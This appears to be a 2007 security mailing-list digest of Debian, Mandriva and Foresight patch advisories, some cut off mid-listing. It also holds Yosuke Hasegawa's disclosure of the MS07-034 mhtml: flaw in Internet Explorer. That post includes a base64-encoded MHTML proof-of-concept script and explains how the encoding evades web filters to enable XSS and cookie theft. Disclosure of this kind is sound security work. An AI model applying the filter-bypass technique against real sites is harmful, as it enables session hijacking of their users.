[SECURITY] [DSA 1317-1] New tinymux packages fix buffer overflow
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA 1317-1 [EMAIL PROTECTED] http://www.debian.org/security/ Steve Kemp June 23, 2007 - Package: tinymux Vulnerability : buffer overflow Problem type : local Debian-specific: no CVE Id(s) : CVE-2007-1655 BugTraq ID : 23292 Debian Bug : 417539 duskwave discovered that tinymux, a text-based multi-user virtual world server, performs insufficient boundary checks when working with user-supplied data, which might lead to the execution of arbitary code. For the stable distribution (etch), this problem has been fixed in version 2.4.3.31-1etch1. We recommend that you upgrade your tinymux package. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Source archives: http://security.debian.org/pool/updates/main/t/tinymux/tinymux_2.4.3.31-1etch1.diff.gz Size/MD5 checksum:25768 5561f8f373ba594299fb08935d0d28b8 http://security.debian.org/pool/updates/main/t/tinymux/tinymux_2.4.3.31.orig.tar.gz Size/MD5 checksum: 925630 7b149de6a1ef5c26b989f05f7f894ba0 http://security.debian.org/pool/updates/main/t/tinymux/tinymux_2.4.3.31-1etch1.dsc Size/MD5 checksum: 609 43a81f38076f544c7d5dcee9b4805082 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/t/tinymux/tinymux_2.4.3.31-1etch1_alpha.deb Size/MD5 checksum: 660202 f789e47d312651b2acdfec1bd62f35f7 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/t/tinymux/tinymux_2.4.3.31-1etch1_amd64.deb Size/MD5 checksum: 646318 a715fedaa66a6656d413086c0c349c84 arm architecture (ARM) http://security.debian.org/pool/updates/main/t/tinymux/tinymux_2.4.3.31-1etch1_arm.deb Size/MD5 checksum: 613350 546c1d9f0346a649104a32fce0ee5501 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/t/tinymux/tinymux_2.4.3.31-1etch1_hppa.deb Size/MD5 checksum: 690748 2c15696925b7ea1e2c60f56613f3477e i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/t/tinymux/tinymux_2.4.3.31-1etch1_i386.deb Size/MD5 checksum: 610106 82526fb744024fb62dc3db8eebe58f14 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/t/tinymux/tinymux_2.4.3.31-1etch1_ia64.deb Size/MD5 checksum: 790390 77d75edb1dc316e0f6943ebb9005d7f0 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/t/tinymux/tinymux_2.4.3.31-1etch1_mips.deb Size/MD5 checksum: 681474 8342b25f33cab216dbb7b2fdef538daa mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/t/tinymux/tinymux_2.4.3.31-1etch1_mipsel.deb Size/MD5 checksum: 683480 28543164a051516b60abd88f6d008a72 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/t/tinymux/tinymux_2.4.3.31-1etch1_powerpc.deb Size/MD5 checksum: 626322 6d66856f933ebc1771116dbe75a4f445 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/t/tinymux/tinymux_2.4.3.31-1etch1_s390.deb Size/MD5 checksum: 635518 86dfa4021ef7ed8834d2e4005c7b95c4 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/t/tinymux/tinymux_2.4.3.31-1etch1_sparc.deb Size/MD5 checksum: 622104 574396c035379caed5d0997f491518fb These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: [EMAIL PROTECTED] Package info: `apt-cache show ' and http://packages.debian.org/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFGfHK4wM/Gs81MDZ0RAuhqAKClWULI5wj6HNemXeQ4fvtu3sJWNwCfU6DH Z6zl2q7oKeV6U+zEpgWYBz8= =KGoY -END PGP SIGNATURE-
[SECURITY] [DSA 1321-1] New evolution-data-server packages fix arbitrary code execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1321-1[EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff June 23rd, 2007 http://www.debian.org/security/faq - -- Package: evolution-data-server Vulnerability : programming error Problem-Type : remote Debian-specific: no CVE ID : CVE-2007-3257 It was discovered that the IMAP code in the Evolution Data Server performs insufficient sanitising of a value later used an array index, which can lead to the execution of arbitrary code. For the oldstable distribution (sarge) a different source package is affected and will be fixed separately. For the stable distribution (etch) this problem has been fixed in version 1.6.3-5etch1. For the unstable distribution (sid) this problem has been fixed in version 1.10.2-2. We recommend that you upgrade your evolution-data-server packages. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Source archives: http://security.debian.org/pool/updates/main/e/evolution-data-server/evolution-data-server_1.6.3-5etch1.dsc Size/MD5 checksum: 1729 c6bba980d10af2b16f1d71759b49ec95 http://security.debian.org/pool/updates/main/e/evolution-data-server/evolution-data-server_1.6.3-5etch1.diff.gz Size/MD5 checksum:53304 9b33f8055b3e5c137db24fe0b8589d5a http://security.debian.org/pool/updates/main/e/evolution-data-server/evolution-data-server_1.6.3.orig.tar.gz Size/MD5 checksum: 9912159 b68864722532715d721f32e8a10660a1 Architecture independent components: http://security.debian.org/pool/updates/main/e/evolution-data-server/evolution-data-server-common_1.6.3-5etch1_all.deb Size/MD5 checksum: 1924028 cbb1b41e70aac90317bd5ec2d7b698e5 Alpha architecture: http://security.debian.org/pool/updates/main/e/evolution-data-server/evolution-data-server_1.6.3-5etch1_alpha.deb Size/MD5 checksum: 556802 bd8e8fbf9d1f73a2dbdd81c8f64e http://security.debian.org/pool/updates/main/e/evolution-data-server/evolution-data-server-dbg_1.6.3-5etch1_alpha.deb Size/MD5 checksum: 3257252 3b463e7efee698ff72abb5c73e33d34d http://security.debian.org/pool/updates/main/e/evolution-data-server/evolution-data-server-dev_1.6.3-5etch1_alpha.deb Size/MD5 checksum:53720 9af9c81737f414ce56a5ad17a03d08da http://security.debian.org/pool/updates/main/e/evolution-data-server/libcamel1.2-8_1.6.3-5etch1_alpha.deb Size/MD5 checksum: 382094 f5f44fcb5cfbcaba9fb2305056a5a8cd http://security.debian.org/pool/updates/main/e/evolution-data-server/libcamel1.2-dev_1.6.3-5etch1_alpha.deb Size/MD5 checksum: 117714 8fda2cca035c648f4b728092a00d04ac http://security.debian.org/pool/updates/main/e/evolution-data-server/libebook1.2-5_1.6.3-5etch1_alpha.deb Size/MD5 checksum: 140362 82a9c78d49ec19318f0730b71a0106c5 http://security.debian.org/pool/updates/main/e/evolution-data-server/libebook1.2-dev_1.6.3-5etch1_alpha.deb Size/MD5 checksum: 122276 8883011de65e5d5301fab7c2873689bd http://security.debian.org/pool/updates/main/e/evolution-data-server/libecal1.2-6_1.6.3-5etch1_alpha.deb Size/MD5 checksum: 332960 c6337a0f853f3b4b1c89032e7373ec74 http://security.debian.org/pool/updates/main/e/evolution-data-server/libecal1.2-dev_1.6.3-5etch1_alpha.deb Size/MD5 checksum: 173334 f56bbb7e36d0f525908f7d27205601e8 http://security.debian.org/pool/updates/main/e/evolution-data-server/libedata-book1.2-2_1.6.3-5etch1_alpha.deb Size/MD5 checksum: 101688 5e39de1e1061ccc8ff26cd5917357b66 http://security.debian.org/pool/updates/main/e/evolution-data-server/libedata-book1.2-dev_1.6.3-5etch1_alpha.deb Size/MD5 checksum:70578 771e3270ccb615f2547f658046098186 http://security.debian.org/pool/updates/main/e/evolution-data-server/libedata-cal1.2-5_1.6.3-5etch1_alpha.deb Size/MD5 checksum: 112638 eeb08bf406dca3da09650f22389168b9 http://security.debian.org/pool/updates/main/e/evolution-data-server/libedata-cal1.2-dev_1.6.3-5etch1_alpha.deb Size/MD5 checksum: 106530 55be0bfab564de1ced2dfc525e243133 http://security.debian.org/pool/updates/main/e/evolution-data-server/libedataserver1.2-7_1.6.3-5etch1_alpha.deb Size/MD5 checksum: 128200 ba05239e9ee
[SECURITY] [DSA 1319-1] New maradns packages fix denial of service
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1319-1[EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff June 23rd, 2007 http://www.debian.org/security/faq - -- Package: maradns Vulnerability : memory leaks Problem-Type : remote Debian-specific: no CVE ID : CVE-2007-3114 CVE-2007-3115 CVE-2007-3116 Several remote vulnerabilities have been discovered in MaraDNS, a simple security-aware Domain Name Service server. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2007-3114 It was discovered that malformed DNS requests can trigger memory leaks, allowing denial of service. CVE-2007-3115 It was discovered that malformed DNS requests can trigger memory leaks, allowing denial of service. CVE-2007-3116 It was discovered that malformed DNS requests can trigger memory leaks, allowing denial of service. The oldstable distribution (sarge) is not affected by these problems. For the stable distribution (etch) these problems have been fixed in version 1.2.12.04-1etch1. For the unstable distribution (sid) these problems have been fixed in version 1.2.12.06-1. We recommend that you upgrade your maradns packages. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Source archives: http://security.debian.org/pool/updates/main/m/maradns/maradns_1.2.12.04-1etch1.dsc Size/MD5 checksum: 503 fedaf5cd91fb31157703e4be4e9cdf9b http://security.debian.org/pool/updates/main/m/maradns/maradns_1.2.12.04-1etch1.tar.gz Size/MD5 checksum: 1323205 1e9d801ed117892160011b3e4ce079a5 Alpha architecture: http://security.debian.org/pool/updates/main/m/maradns/maradns_1.2.12.04-1etch1_alpha.deb Size/MD5 checksum: 550830 ea1a65dbf070a010459fb20cfd5ec2d9 AMD64 architecture: http://security.debian.org/pool/updates/main/m/maradns/maradns_1.2.12.04-1etch1_amd64.deb Size/MD5 checksum: 500726 174bd3dc187bc3dc42204ac39ebb712c ARM architecture: http://security.debian.org/pool/updates/main/m/maradns/maradns_1.2.12.04-1etch1_arm.deb Size/MD5 checksum: 476514 aaec23eccc02e47ccf116e83ed124812 HP Precision architecture: http://security.debian.org/pool/updates/main/m/maradns/maradns_1.2.12.04-1etch1_hppa.deb Size/MD5 checksum: 522804 92ecf17008e23cbd259b60809585 Intel IA-32 architecture: http://security.debian.org/pool/updates/main/m/maradns/maradns_1.2.12.04-1etch1_i386.deb Size/MD5 checksum: 471380 3d043e426e827de1aa4dbfd1b31067ad Intel IA-64 architecture: http://security.debian.org/pool/updates/main/m/maradns/maradns_1.2.12.04-1etch1_ia64.deb Size/MD5 checksum: 661602 a37fee1f631c57eb6b2dee34304e78b3 Big endian MIPS architecture: http://security.debian.org/pool/updates/main/m/maradns/maradns_1.2.12.04-1etch1_mips.deb Size/MD5 checksum: 528210 bc0fd0dfdbe3874744926c9639abcd73 Little endian MIPS architecture: http://security.debian.org/pool/updates/main/m/maradns/maradns_1.2.12.04-1etch1_mipsel.deb Size/MD5 checksum: 529462 7873452d29da60ea893d122948428765 PowerPC architecture: http://security.debian.org/pool/updates/main/m/maradns/maradns_1.2.12.04-1etch1_powerpc.deb Size/MD5 checksum: 487376 b8e20a8276fdadef4a8e21a0547e23e8 IBM S/390 architecture: http://security.debian.org/pool/updates/main/m/maradns/maradns_1.2.12.04-1etch1_s390.deb Size/MD5 checksum: 499358 a6bae8e178c673ea148e649f15e3c2e0 Sun Sparc architecture: http://security.debian.org/pool/updates/main/m/maradns/maradns_1.2.12.04-1etch1_sparc.deb Size/MD5 checksum: 462904 da20b0ae8b512b047e7680c181f7c135 These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: [EMAIL PROTECTED] Package info: `apt-cache show ' and http://packages.debian.org/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFGfO2mXm3vHE4uyloRAoqsAKCh7rf5zMnF4RF+AvFUoYq0ATKN+gCfQdzp Qj8iA1m7diTL2OQzp/CKZeI=
Re: Re: PHPMyDesk Beta Release 1.0b ==> RFI
this has been fixed in current version already, update your config file from the current version.
[SECURITY] [DSA 1320-1] New clamav packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1320-1[EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff June 23th, 2007 http://www.debian.org/security/faq - -- Package: clamav Vulnerability : several Problem-Type : remote Debian-specific: no CVE ID : CVE-2007-2650 CVE-2007-3023 CVE-2007-3024 CVE-2007-3122 CVE-2007-3123 Several remote vulnerabilities have been discovered in the Clam anti-virus toolkit. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2007-2650 It was discovered that the OLE2 parser can be tricked into an infinite loop and memory exhaustion. CVE-2007-3023 It was discovered that the NsPack decompression code performed insufficient sanitising on an internal length variable, resulting in a potential buffer overflow. CVE-2007-3024 It was discovered that temporary files were created with insecure permissions, resulting in information disclosure. CVE-2007-3122 It was discovered that the decompression code for RAR archives allows bypassing a scan of a RAR archive due to insufficient validity checks. CVE-2007-3123 It was discovered that the decompression code for RAR archives performs insufficient validation of header values, resulting in a buffer overflow. For the oldstable distribution (sarge) these problems have been fixed in version 0.84-2.sarge.17. Please note that the fix for CVE-2007-3024 hasn't been backported to oldstable. For the stable distribution (etch) these problems have been fixed in version 0.90.1-3etch1. For the unstable distribution (sid) these problems have been fixed in version 0.90.2-1. We recommend that you upgrade your clamav packages. An updated package for oldstable/powerpc is not yet available. It will be provided later. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.17.dsc Size/MD5 checksum: 874 334efba90e36f3b1cc1e7d88ca0990bb http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.17.diff.gz Size/MD5 checksum: 181825 ce287c93cc5080aefcf5d37d1ee4b261 http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84.orig.tar.gz Size/MD5 checksum: 4006624 c43213da01d510faf117daa9a4d5326c Architecture independent components: http://security.debian.org/pool/updates/main/c/clamav/clamav-base_0.84-2.sarge.17_all.deb Size/MD5 checksum: 155334 915b8f9d1fa7eb390dd0b11fa894eb26 http://security.debian.org/pool/updates/main/c/clamav/clamav-docs_0.84-2.sarge.17_all.deb Size/MD5 checksum: 690966 a6411bca9fcc48905421f54bdc71c565 http://security.debian.org/pool/updates/main/c/clamav/clamav-testfiles_0.84-2.sarge.17_all.deb Size/MD5 checksum: 124326 6e75aa8d619f42642f74effb1c8f5bbc Alpha architecture: http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.17_alpha.deb Size/MD5 checksum:74772 551be2a5e31f847c0cfd85c62741b20d http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.17_alpha.deb Size/MD5 checksum:48694 c6be8dca1533ea57b860129e8ca2d9eb http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.17_alpha.deb Size/MD5 checksum: 2175742 f2aadf9f40b450700336016f04d1d8b5 http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.17_alpha.deb Size/MD5 checksum:41726 b9321ac5b1abcc9a89ea1bc5d18b28f2 http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.17_alpha.deb Size/MD5 checksum: 256230 de4e35581860c20ee5c2054f64c085d0 http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.17_alpha.deb Size/MD5 checksum: 286640 3a783db1e37ab05a1a3cfdcecf06a1da AMD64 architecture: http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.17_amd64.deb Size/MD5 checksum:69012 667f196a7a32aab096c367f7bf26282d http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.17_amd64.deb Size/MD5 checksum:44292 0120d71543d4ef2c8e9efae415adfd91 http://security.debian.
[SECURITY] [DSA 1318-1] New ekg packages fix denial of service
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1318-1[EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff June 22nd, 2007 http://www.debian.org/security/faq - -- Package: ekg Vulnerability : several Problem-Type : remote Debian-specific: no CVE ID : CVE-2005-2370 CVE-2005-2448 CVE-2007-1663 CVE-2007-1664 CVE-2007-1665 Several remote vulnerabilities have been discovered in ekg, a console Gadu Gadu client. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2005-2370 It was discovered that memory alignment errors may allow remote attackers to cause a denial of service on certain architectures such as sparc. This only affects Debian Sarge. CVE-2005-2448 It was discovered that several endianess errors may allow remote attackers to cause a denial of service. This only affects Debian Sarge. CVE-2007-1663 It was discovered that a memory leak in handling image messages may lead to denial of service. This only affects Debian Etch. CVE-2007-1664 It was discovered that a null pointer deference in the token OCR code may lead to denial of service. This only affects Debian Etch. CVE-2007-1665 It was discovered that a memory leak in the token OCR code may lead to denial of service. This only affects Debian Etch. For the oldstable distribution (sarge) these problems have been fixed in version 1.5+20050411-7. This updates lacks updated packages for the m68k architecture. They will be provided later. For the stable distribution (etch) these problems have been fixed in version 1:1.7~rc2-1etch1. For the unstable distribution (sid) these problems have been fixed in version 1:1.7~rc2-2. We recommend that you upgrade your ekg packages. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/e/ekg/ekg_1.5+20050411-7.dsc Size/MD5 checksum: 755 c13c5003913b5a6826a2318ff6457466 http://security.debian.org/pool/updates/main/e/ekg/ekg_1.5+20050411-7.diff.gz Size/MD5 checksum:43213 bbcdcf5b7acf8df37c6557fb3caf65f2 http://security.debian.org/pool/updates/main/e/ekg/ekg_1.5+20050411.orig.tar.gz Size/MD5 checksum: 495079 bc246779de6f6c97f289e60b60db6c14 Alpha architecture: http://security.debian.org/pool/updates/main/e/ekg/ekg_1.5+20050411-7_alpha.deb Size/MD5 checksum: 313386 5f9e1df11e20416d456550fbc7272b6b http://security.debian.org/pool/updates/main/e/ekg/libgadu-dev_1.5+20050411-7_alpha.deb Size/MD5 checksum: 154124 fbfb2b2dac00fd0b8f8d520a034808e1 http://security.debian.org/pool/updates/main/e/ekg/libgadu3_1.5+20050411-7_alpha.deb Size/MD5 checksum:70480 bbc1774ca41b284d7077075b2e54e094 AMD64 architecture: http://security.debian.org/pool/updates/main/e/ekg/ekg_1.5+20050411-7_amd64.deb Size/MD5 checksum: 280046 8afce052b5a90e52d98bb5056b4c3677 http://security.debian.org/pool/updates/main/e/ekg/libgadu-dev_1.5+20050411-7_amd64.deb Size/MD5 checksum: 129478 cb4c07f3a023501dc4282a949ae6f0c3 http://security.debian.org/pool/updates/main/e/ekg/libgadu3_1.5+20050411-7_amd64.deb Size/MD5 checksum:64766 91cb2126b68ad573beb3cf71a10a4862 ARM architecture: http://security.debian.org/pool/updates/main/e/ekg/ekg_1.5+20050411-7_arm.deb Size/MD5 checksum: 268022 8e83e14d2221e43e0f84d21004ecdc6e http://security.debian.org/pool/updates/main/e/ekg/libgadu-dev_1.5+20050411-7_arm.deb Size/MD5 checksum: 129516 75f62242848fcd8c04a769d8b2b70fb3 http://security.debian.org/pool/updates/main/e/ekg/libgadu3_1.5+20050411-7_arm.deb Size/MD5 checksum:62650 9f1005a1902d5f088f8916113da1d9fa HP Precision architecture: http://security.debian.org/pool/updates/main/e/ekg/ekg_1.5+20050411-7_hppa.deb Size/MD5 checksum: 288256 2f760288780881eff8c000a7d5287ab7 http://security.debian.org/pool/updates/main/e/ekg/libgadu-dev_1.5+20050411-7_hppa.deb Size/MD5 checksum: 135902 42d5b64ede073387c03f914c2f3b9a7d http://security.debian.org/pool/updates/main/e/ekg/libgadu3_1.5+20050411-7_hppa.deb Size/MD5 checksum:69330 31208354bcb32e72e812f773cb5bd582 Intel
[ MDKSA-2007:135 ] - Updated webmin packages fix XSS vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:135 http://www.mandriva.com/security/ ___ Package : webmin Date: June 23, 2007 Affected: 2007.0, 2007.1, Corporate 4.0 ___ Problem Description: Multiple cross-site scripting (XSS) vulnerabilities were discovered in pam_login.cgi in webmin prior to version 1.350, which could allow a remote attacker to inject arbitrary web script or HTML. Updated packages have been patched to prevent this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3156 ___ Updated Packages: Mandriva Linux 2007.0: b8981f770501be8eccacb49eef5ed40d 2007.0/i586/webmin-1.290-4.4mdv2007.0.noarch.rpm 0247107019e5b014d1931d1bc9efbc8a 2007.0/SRPMS/webmin-1.290-4.4mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: b8981f770501be8eccacb49eef5ed40d 2007.0/x86_64/webmin-1.290-4.4mdv2007.0.noarch.rpm 0247107019e5b014d1931d1bc9efbc8a 2007.0/SRPMS/webmin-1.290-4.4mdv2007.0.src.rpm Mandriva Linux 2007.1: 143e2320e03544c7a40d11c6e0aacaa6 2007.1/i586/webmin-1.320-1.1mdv2007.1.noarch.rpm 15e22c891aed715223d5d655c2076691 2007.1/SRPMS/webmin-1.320-1.1mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 143e2320e03544c7a40d11c6e0aacaa6 2007.1/x86_64/webmin-1.320-1.1mdv2007.1.noarch.rpm 15e22c891aed715223d5d655c2076691 2007.1/SRPMS/webmin-1.320-1.1mdv2007.1.src.rpm Corporate 4.0: b84091c9b3a44dd5dcf7e1945661bfb4 corporate/4.0/i586/webmin-1.220-9.8.20060mlcs4.noarch.rpm 5715885df4fcddade5de4b0fdddcaa32 corporate/4.0/SRPMS/webmin-1.220-9.8.20060mlcs4.src.rpm Corporate 4.0/X86_64: b84091c9b3a44dd5dcf7e1945661bfb4 corporate/4.0/x86_64/webmin-1.220-9.8.20060mlcs4.noarch.rpm 5715885df4fcddade5de4b0fdddcaa32 corporate/4.0/SRPMS/webmin-1.220-9.8.20060mlcs4.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (GNU/Linux) iD8DBQFGfDJ8mqjQ0CJFipgRAt+IAKDcXdUoZh07acfRhsgJVUI6Jk7W8QCfe/gK dul83B0vtcP65zOjWdchgM0= =qMMp -END PGP SIGNATURE-
FLEA-2007-0028-1: libexif
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Foresight Linux Essential Advisory: 2007-0028-1 Published: 2007-06-22 Rating: Moderate Updated Versions: libexif=/[EMAIL PROTECTED]:devel//[EMAIL PROTECTED]:1-devel//1/0.6.16-0.1-1 group-dist=/[EMAIL PROTECTED]:1-devel//1/1.3.1-0.1-3 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4168 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4168 Description: Previous versions of the libexif package are vulnerable to an int overflow which could allow a specially-crafted EXIF file to execute arbitrary code on the target system. - --- Copyright 2007 Foresight Linux Project This file is distributed under the terms of the MIT License. A copy is available at http://www.foresightlinux.org/permanent/mit-license.html -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.1 (GNU/Linux) iQIVAwUBRnweLdfwEn07iAtZAQLgbg/+PFvCmjYWWZpNSrC3/mVb0+3uzGv73VYr SgT0LPp6y9e9cqorey441ojE/0XX+BZ3sgE1FC7PPlKIoNy9sFz12kJXFnV+sNOG RU3Tm0G/ivJZ7GR8Kvjk95YxnWFFFSxRg+iL4+hjtz0OcrRhF6CZ24Ib3Gpv7VDs 8XxtMtVD9bR+vhe+Ji4Gy/m6ObH+woI+RwLtJKc4uQhhlP+SdGitNNOjdWNzusLn BGaBBg0zvpcMCklXY24A8AIbaIg1Rf/tgXJe7nn5xTPqsu+8ZtBGKns4KingAPob L8ybyubRJhU7vsDfv8cdsXgXskgAL2LC/RedX1q2PWnDgwAs/blNMGzI2bl2CdBe 2Df9Exk2E8JHT97gUD7bI7lIJnuWnkkW2e9yMOSLB2hdcUSlWxEPLS+OrTCFNFWc 7Pe8lQ5hiubjBnk1FKDNjMz8UILIqeGPNwQYjsccGnRB/naamAmzy7d8Qhw3P/5q 943jVC7Ci5pGUi/p4ft5eNX4vOkZRUeDOWV1eILjmZlEu0tTDQ4beCNSUsnEtCp9 N/ru5Th8DGxGMbiTL+wnAtcC8kN1HLuk4rOONOuNHBUCBdpsLBNNO/LHQkE8M95T aDePbu63+HAoaGwAOTlt/U5Nx+uS+B2SwuG1ypTbyRtr05YXgJytERBuNILlUGcF VZH0By4mOcc= =wHz4 -END PGP SIGNATURE-
MS07-034: Executing arbitrary script with mhtml: protocol handler
MS07-034: Executing arbitrary script with mhtml: protocol handler Author:Yosuke HASEGAWA Date: Wed, 21 Jun 2007 CVE: CVE-2007-2225, CVE-2007-2227 Original advisory: http://openmya.hacker.jp/hasegawa/security/ms07-034.txt http://archive.openmya.devnull.jp/2007.06/msg00060.html Abstract: In Internet Explorer, with mhtml: protocol handler and using Outlook Express's feature, arbitrary resources (such as HTML, image, application file and so on) can opened as MHTML formatted file and Content-Type: is disregarded. It is possible to treat by text/html including JavaScript encoded base64 or Quoted-Printable in MHTML format. Therefore, it was possible to have bypassed filtering of the dangerous character (or string) usually carried out in the Web application of the large range, and to have execute arbitrary scripts. Tested version: Outlook Express 6 / Internet Explorer 6 / Internet Explorer 7 Details: In IE, When the prefix of "mhtml" is given to the URL and it accesses a resource, the function of OE is used( mhtml protocol handler is called), and IE deals with that resource as a MHTML(RFC2557) formatted document. The behavior of IE is peculiar as follows when a document is opened as a MHTML form through mhtml: protocol handler. - Content-Type: HTTP response header is ignored. - It doesn't depend on the setting "Open files based on content, not file extension", and "MHTML" is always forced as a file type for the resource. - In the MHTML document, Separated from the MHTML header by a MHTML body by the CR/LF in HTTP response body. - In the MHTML document, encoding by base64 or Quoted-Printable can be used for the MHTML body part by specifying it with a MHTML header. - In the MHTML document, text/html document type can be used for the MHTML body part by specifying it with a MHTML header and can be included script in the body part. - "Content-Disposition: attachment" HTTP response header is ignored, and the resource is opened without user's confirmation. Therefore, even if it was it to the Web application that it coped with it suitably, script was put in the form encoded with base64 and Quoted- Printable inside, and it was possible that XSS was made to occur. For example, -- Subject: test Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: base64 PGh0bWw+DQo8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmxvY2F0aW9uKTs8L3NjcmlwdD4NCjwv aHRtbD4NCg== -- Open this HTML file through the mhtml: protocol handler such as http://example.com/test.html>, IE/OE assumed the file as MHTML, not HTML, including script encoded by base64. The script is encoded by base64, Because it is being encoded with base64, script passes through the web application's filter, and it is possible that XSS is made to occur. In order to ignore Content-Type: header completely, includes the MHTML contents, it was possible even in XML, images, application fille like as *.doc, and the like not only HTML to execute the script. Background: May 2004 The publication by the first discoverer (probably). (Japanese contents) http://web.archive.org/web/20040607114853/www2.sala.or.jp/~uuu/security/jpeg1.html Jul 2004 Article of Slashdot Japan "Many Unmeasures vulnerability discoverd in Japan" is published. (Japanese contents) http://slashdot.jp/security/article.pl?sid=04/07/29/0635211 Feb 2005 [Full-Disclosure] Possible XSS issue on Windows XPSP2 IE6 via MIME Encapsulation of Aggregate HTML http://lists.grok.org.uk/pipermail/full-disclosure/2005-February/032058.html Sep 2006 Ask to grasp it as a vulnerability in Microsoft about this. Oct 2006 Response from Microsoft, "Behavior by design of IE". Oct 2006 Report to Microsoft that the XSS is made to occur and can steel Cookie by using this behavior on on search.microsoft.com / search.live.com / search.msn.com. Oct 2006 Report to Microsoft via IPA/ISEC as the vulnerability of Web application that the XSS is made to occur and can steel Cookie by using this behavior on on spaces.live.com / msn.co.jp. Oct 2006 Report to Microsoft via IPA/ISEC as the vulnerability of IE, about the "Content-Disposition: attachment" header is ignored via mhtml: protocol handler. Dec 2006 Received the contact to deal with handling this case as a vulnerability of OE from Microsoft via IPA/ISEC. Jun 2007 Security fix for OE released as MS07-034. Acknowledgment: I appreciate deeply hoshikuzu|star_dust who told me the problem that it is introduced to the public in 2004 existing for 2006 years even in the moment, the offer of PoC, and various information. -- HASEGAWA Yosuke yosuke.hasegawa at gmail.com Microsoft MVP for Windows - Security (Oct 2005 - Sep 2007)
Re: Re: New Include Redirect Bug XSS All vBulletin(r) v 3.x.x
